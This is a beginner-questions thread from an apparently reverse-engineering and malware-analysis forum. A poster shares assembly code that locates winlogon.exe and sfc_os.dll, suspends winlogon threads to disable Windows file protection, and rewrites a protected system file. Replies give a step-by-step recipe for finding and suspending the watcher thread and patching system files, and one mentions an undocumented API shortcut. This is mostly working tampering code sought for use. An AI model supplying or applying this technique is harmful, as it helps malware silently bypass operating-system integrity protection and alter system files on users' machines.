A forum for reverse engineering, OS internals and malware analysis 

Ask your beginner questions here.
 #12048  by osC7h
 Fri Mar 09, 2012 8:11 pm
Hi again, my project not work. How can I detect the target ThreadID?
Code: Select all
szText Problem_ANA ,"winlogon.exe"
szText Problem_BABA ,"SFC :)"
szText Problem_COCUK ,"sfc_os.dll"

invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS,0
.IF (eax != INVALID_HANDLE_VALUE)
	mov hSnapshotP, eax
	mov [ProcEnt.dwSize], sizeof ProcEnt
	invoke Process32First, hSnapshotP, ADDR ProcEnt
	.IF (eax)
		@0P:
		invoke lstrcmpi, addr Problem_ANA ,addr [ProcEnt.szExeFile]
		.IF (eax == 0)
			invoke CreateToolhelp32Snapshot, TH32CS_SNAPMODULE, [ProcEnt.th32ProcessID]
			mov hSnapshotM, eax
			mov [ModuleE.dwSize], sizeof ModuleE
			invoke Module32First, hSnapshotM, ADDR ModuleE
			@0M:
			invoke lstrcmpi, addr Problem_COCUK ,addr [ModuleE.szModule]
			.if (eax == 0)
				invoke CreateToolhelp32Snapshot, TH32CS_SNAPTHREAD, [ProcEnt.th32ProcessID]
				mov hSnapshotT, eax
				mov [ThreadE.dwSize], sizeof ThreadE
				invoke Thread32First, hSnapshotT, ADDR ThreadE
				@0T:
				invoke OpenThread, THREAD_SUSPEND_RESUME, NULL, [ThreadE.th32ThreadID]
				.if (eax)
					mov hxThread, eax
					add sxThread, 1
					.if (sxThread == 1)
						jmp		@0NT
					.endif
					push eax
					invoke SuspendThread, eax
					mov					hxSYSFile, func(CreateFile, offset xSYSFile, GENERIC_READ + GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0)
					.If					eax != INVALID_HANDLE_VALUE
						mov				dxSYSFileSize, func(GetFileSize, hxSYSFile, 0)
						mov				pxSYSBuffer, func(VirtualAlloc, NULL, dxSYSFileSize, MEM_COMMIT, PAGE_READWRITE)
						.If				eax != NULL
							invoke		ReadFile, hxSYSFile, pxSYSBuffer, dxSYSFileSize, offset dxBytesRW, NULL
							mov			esi, pxSYSBuffer
							xor			[esi].IMAGE_DOS_HEADER.e_magic, IMAGE_DOS_SIGNATURE
							invoke		CloseHandle, hxSYSFile
							mov         hxtSYSFile, func(CreateFile, offset xSYSFile, GENERIC_READ + GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)
							invoke      WriteFile, hxtSYSFile, pxSYSBuffer, dxSYSFileSize, offset dxBytesRW, NULL
							invoke      CloseHandle, hxtSYSFile
							invoke		VirtualFree, pxSYSBuffer, 0, MEM_RELEASE
						.Else
							invoke		CloseHandle, hxSYSFile	;	[Error] Unable to allocate memory for file
					.EndIf
					.Else
						;	[Error] Unable to open the file
					.EndIf
					invoke	Sleep, 7000
					mov					hxSYSFile, func(CreateFile, offset xSYSFile, GENERIC_READ + GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0)
					.If					eax != INVALID_HANDLE_VALUE
						mov				dxSYSFileSize, func(GetFileSize, hxSYSFile, 0)
						mov				pxSYSBuffer, func(VirtualAlloc, NULL, dxSYSFileSize, MEM_COMMIT, PAGE_READWRITE)
						.If				eax != NULL
							invoke		ReadFile, hxSYSFile, pxSYSBuffer, dxSYSFileSize, offset dxBytesRW, NULL
							mov			esi, pxSYSBuffer
							.If			[esi].IMAGE_DOS_HEADER.e_magic == IMAGE_DOS_SIGNATURE
								invoke	VirtualFree, pxSYSBuffer, 0, MEM_RELEASE
								invoke	CloseHandle, hxSYSFile
								
								jmp		@0NT
							.Else
								xor		[esi].IMAGE_DOS_HEADER.e_magic, IMAGE_DOS_SIGNATURE
								invoke	CloseHandle, hxSYSFile
								mov     hxtSYSFile, func(CreateFile, offset xSYSFile, GENERIC_READ + GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)
								invoke  WriteFile, hxtSYSFile, pxSYSBuffer, dxSYSFileSize, offset dxBytesRW, NULL
								invoke  CloseHandle, hxtSYSFile
								
							.EndIf
							invoke		VirtualFree, pxSYSBuffer, 0, MEM_RELEASE
						.Else
							invoke		CloseHandle, hxSYSFile	;	[Error] Unable to allocate memory for file
						.endif
					.Else
						;	[Error] Unable to open the file
					.endif	
					;.if [ModuleE.hModule] == eax
				
				.endif
				@0NT:
				invoke Thread32Next, hSnapshotT, ADDR ThreadE
				test eax,eax
				jnz @0T
			.endif
			invoke Module32Next, hSnapshotM, ADDR ModuleE
			test eax,eax
			jnz @0M

		.ENDIF
		invoke Process32Next, hSnapshotP,ADDR ProcEnt
		test eax,eax
		jnz @0P
	.ENDIF
.ENDIF
invoke CloseHandle, hSnapshotP
Image
 #12049  by everdox
 Fri Mar 09, 2012 11:00 pm
um maybe I have read you wrong here but you are on the right track with your code. The toolhelp api uses NtQuerySystemInformation with the SYSTEM_PROCESS_INFORMATION class, and appended to the end of each entry is an array of http://undocumented.ntinternals.net/Use ... HREAD.html. So check the client id. Or in the case of the toolhelp api the ThreadNext functions populate the buffer with the owning process id. So just match them up.
 #12050  by EP_X0FF
 Sat Mar 10, 2012 2:38 am
SetSfcFileException should do the trick without terminating watcher thread.
 #12096  by osC7h
 Tue Mar 13, 2012 3:26 pm
How can I find the first-next thread?
Code: Select all
szText Problem_ANA ,"winlogon.exe"

invoke NtQuerySystemInformation, 5, NULL, 0, ADDR dwReturnLength
invoke VirtualAlloc, NULL, dwReturnLength, MEM_COMMIT, PAGE_READWRITE
TEST EAX, EAX
JE EndMain
MOV EDI, EAX
invoke NtQuerySystemInformation, 5, EDI, dwReturnLength, ADDR dwReturnLength
TEST EAX, EAX
JNE FreeMem
ASSUME EDI:PTR SYSTEM_PROCESS_INFORMATION
ProcessLoop:
MOV EAX, [EDI].ProcessName.Buffer
TEST EAX, EAX
JE NextItem
invoke WideToAnsi, EAX
invoke lstrcmpi, addr Problem_ANA, addr szBuffer
.if (eax == 0)
	MOV EAX, [EDI].Threads.........????????????????????????????????????????????????????????????

.endif
NextItem:
CMP [EDI].NextEntryDelta, 0
JE FreeMem
ADD EDI, [EDI].NextEntryDelta
JMP ProcessLoop
FreeMem:
invoke VirtualFree, EDI, 0, MEM_RELEASE
EndMain:
 #12129  by EP_X0FF
 Thu Mar 15, 2012 11:20 am
You have already got all answers. No one will write code for you.

1. Locate winlogon (Process32First/Process32Next, NtQuerySystemInformation)
2. Locate sfc dll (Module32First/Module32Next)
3. Enumerate winlogon threads (Thread32First/Thread32Next, NtQuerySystemInformation)
4. Get thread start address (NtQueryInformationThread) and compare it to be within sfc dll range
5. Suspend thread, patch system file.

or use SFC API I mentioned above. STFG.
 #12157  by R00tKit
 Fri Mar 16, 2012 8:17 am
great method( suspend thread) i used it in some where else ( unpacking ,..)

STFG :lol: :lol: :lol: